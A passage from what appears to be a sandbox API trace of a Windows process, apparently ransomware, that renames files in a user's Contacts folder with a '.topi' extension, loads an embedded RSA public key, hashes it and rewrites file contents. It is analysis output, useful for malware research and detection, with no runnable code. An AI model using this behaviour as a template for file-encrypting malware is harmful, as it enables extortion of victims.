hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0093.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.255] GetCurrentThreadId () returned 0x8c4 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e0c50 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0093.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.256] GetCurrentThreadId () returned 0x8c4 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0093.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf60 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8dc0 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0093.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0093.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf78 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0093.259] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x495, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb14*=0x495, lpOverlapped=0x0) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0093.259] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.259] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0093.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0093.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0093.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0093.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0093.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0093.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0093.260] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0093.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0093.260] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0093.260] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0093.260] CloseHandle (hObject=0x6a8) returned 1 [0093.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0093.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0093.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0093.277] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.topi")) returned 1 [0093.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.278] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0093.279] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0093.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0093.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0093.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0093.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0093.280] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=68382) returned 1 [0093.280] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0093.283] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.284] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0093.293] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.293] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.293] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.293] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0093.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.317] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x3193e68 [0093.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.317] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.317] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0093.318] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0093.318] CryptHashData (hHash=0x31c7580, pbData=0x3193e68, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0093.318] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0093.318] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0093.318] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0093.318] GetLastError () returned 0x0 [0093.318] SetLastError (dwErrCode=0x0) [0093.318] GetLastError () returned 0x0 [0093.318] SetLastError (dwErrCode=0x0) [0093.318] GetLastError () returned 0x0 [0093.318] SetLastError (dwErrCode=0x0) [0093.318] GetLastError () returned 0x0 [0093.318] SetLastError (dwErrCode=0x0) [0093.318] GetLastError () returned 0x0 [0093.318] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.319] SetLastError (dwErrCode=0x0) [0093.319] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.320] SetLastError (dwErrCode=0x0) [0093.320] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] GetLastError () returned 0x0 [0093.321] SetLastError (dwErrCode=0x0) [0093.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0093.321] CryptDestroyHash (hHash=0x31c7580) returned 1 [0093.321] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0093.321] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0093.321] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0093.321] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0093.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.322] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0093.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10b20) returned 0x99f52d8 [0093.322] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 